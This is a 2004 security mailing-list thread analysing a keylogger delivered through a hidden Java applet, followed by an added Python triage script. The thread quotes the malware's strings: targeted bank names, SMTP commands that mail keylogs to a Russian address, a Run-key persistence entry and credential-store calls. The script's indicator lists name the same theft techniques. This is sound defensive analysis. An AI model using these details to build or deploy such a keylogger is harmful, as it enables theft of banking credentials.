Full Disclosure mailing list archives

RE: Re: http://federalpolice.com:article872@1075686747


From: "Aditya, ALD [Aditya Lalit Deshmukh]" <aditya.deshmukh () online gateway technolabs net>
Date: Mon, 16 Feb 2004 09:22:51 +0530

this is a keylogger that will mail out your interesting logs to some Russian address!
so beware of this one,

but what I couldn't understand is how this file is executed?

-aditya

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com]On Behalf Of
n.teusink () planet nl
Sent: Sunday, February 15, 2004 11:40 PM
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] Re:
http://federalpolice.com:article872@1075686747


From the source of that page:

<APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1>

BlackBox.class is detected immediately by my virus scanner as ClassLoader/E; more info:
http://www.viruslibrary.com/virusinfo/Trojan.Java.ClassLoader.htm

The javautil.zip appears to be an exe file renamed to zip. The exe is compressed with FSG.

Interesting pieces of output from strings on the decompressed exe:


----------------------------------------------BEGIN
HookerDll.Dll
Install
Uninstall
EDIT
%s\%s
WVS3
      \kgn.txt
Hooker.dll
Install
Uninstall
Westpac
bendigo
Bendigo
e-bendigo
e-Bendigo
commbank
Commonwealth
NetBank
Citibank
Bank of America
e-gold
e-bullion
e-Bullion
evocash
EVOCash
EVOcash
intgold
INTGold
paypal
PayPal
bankwest
Bank West
BankWest
National Internet Banking
cibc
CIBC
scotiabank
ScotiaBank
Scotia Bank
bank of montreal
Bank of Montreal
royalbank
Royal Bank
RoyalBank
tdwaterhouse
TD Canada Trust
TD Waterhouse
president's choice
President's Choice
President Choice
suncorpmetway
Suncorp
macquarie
Macquarie
INTgold
1mdc
1MDC
TD Waterhouse
goldmoney
GoldMoney
goldgrams
pecunix
Pecunix
Pecun!x
hyperwallet
HyperWallet
Wells Fargo
Bank One
Banesto
CAIXA
SunTrust
Sun Trust
Discover Card
Washington Mutual
Wachovia
desjardins
Chase
0+060F0
1$11161J1U1i1
2.2I2\2
3'3,3E3c3h3r3
4%42484>4D4J4P4V4\4b4h4n4t4z4
DATA
EHLO localhost
Subject: KeyLog from (%s)
MAIL FROM:<pentasatan () mail ru>
RCPT TO:<pentasatan () mail ru>
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
open
pstorec.dll
PStoreCreateInstance
internet explorer
http://
wininetcachecredentials
Cookie:
----------------------------------------------END

I think you can draw your own conclusions about this file.

Niels

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html




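The triage Niels did by hand above (notice that the "zip" is really an exe, then run strings on the unpacked body and read off the targets, the SMTP exfiltration, the Run key and the Protected Storage calls) as a small script. This is an added example and is not code from either post. The two sample blobs are constructed here for the demo (the mail address in them is a placeholder), and the INDICATORS keyword lists are an assumption based on the strings quoted in the post, not a signature for the real sample.

```python
"""Triage of a download named like a .zip that may be a renamed Windows
executable: check the real file type by magic bytes, run a strings-style
extraction, and flag indicator categories.

Added example, not code from the original posts. SAMPLE_RENAMED_EXE and
SAMPLE_PACKED are constructed here; INDICATORS is an assumed keyword set
derived from the strings quoted in the post.
"""
import math
import random
import re
from typing import Dict, List

ZIP_MAGIC = b"PK\x03\x04"   # local file header every real ZIP archive starts with
PE_MAGIC = b"MZ"            # DOS stub that every Windows PE executable starts with

# Assumed indicator categories, built from strings quoted in the post.
INDICATORS: Dict[str, List[str]] = {
    "smtp_exfil": ["EHLO", "MAIL FROM:", "RCPT TO:", "Subject: KeyLog"],
    "persistence": ["CurrentVersion\\Run"],
    "credential_theft": ["pstorec.dll", "PStoreCreateInstance",
                         "wininetcachecredentials", "Cookie:"],
    "hooking": ["Hooker.dll", "HookerDll.Dll"],
    "financial_targets": ["PayPal", "Citibank", "e-gold", "NetBank",
                          "Westpac", "Wells Fargo"],
}


def identify(data: bytes) -> str:
    """Classify by magic bytes; the file extension is not trusted at all."""
    if data.startswith(ZIP_MAGIC):
        return "zip"
    if data.startswith(PE_MAGIC):
        return "pe"
    return "unknown"


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Same idea as `strings -n 4`: runs of printable ASCII of min_len or more."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; packed or compressed bodies sit near 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def classify(strings: List[str]) -> Dict[str, List[str]]:
    """Map each indicator category to the extracted strings that hit it."""
    hits: Dict[str, List[str]] = {}
    for category, needles in INDICATORS.items():
        found = sorted({s for s in strings
                        for n in needles if n.lower() in s.lower()})
        if found:
            hits[category] = found
    return hits


def triage(filename: str, data: bytes) -> dict:
    """Full pass: claimed vs. actual type, packing heuristic, indicator hits."""
    claimed = filename.rsplit(".", 1)[-1].lower()
    actual = identify(data)
    return {
        "claimed": claimed,
        "actual": actual,
        "extension_lies": actual != "unknown" and actual != claimed,
        # Above ~7 bits/byte, strings on the raw file shows little: unpack first.
        "likely_packed": entropy(data) > 7.0,
        "indicators": classify(extract_strings(data)),
    }


# Constructed sample 1: PE-looking blob carrying the kind of strings the post
# quotes. The mail address is a placeholder, not the one in the real sample.
_STRINGS = [
    b"Hooker.dll", b"Install", b"Uninstall", b"Westpac", b"Citibank",
    b"PayPal", b"e-gold", b"EHLO localhost", b"Subject: KeyLog from (%s)",
    b"MAIL FROM:<attacker@example.invalid>",
    b"RCPT TO:<attacker@example.invalid>",
    b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
    b"pstorec.dll", b"PStoreCreateInstance", b"wininetcachecredentials",
    b"Cookie:",
]
SAMPLE_RENAMED_EXE = PE_MAGIC + b"\x00" * 62 + b"\x00".join(_STRINGS) + b"\x00" * 256

# Constructed sample 2: stands in for an FSG-packed body, where the payload
# strings only become visible after unpacking (seeded so the demo is stable).
_rng = random.Random(7)
SAMPLE_PACKED = PE_MAGIC + bytes(_rng.getrandbits(8) for _ in range(4096))

if __name__ == "__main__":
    for blob in (SAMPLE_RENAMED_EXE, SAMPLE_PACKED):
        print(triage("javautil.zip", blob))
```

The second sample is the caveat the post implies: on a packed body the type check still says "pe" and the entropy flag fires, but the indicator hits come back empty, which is why Niels ran strings on the decompressed exe rather than on javautil.zip as served.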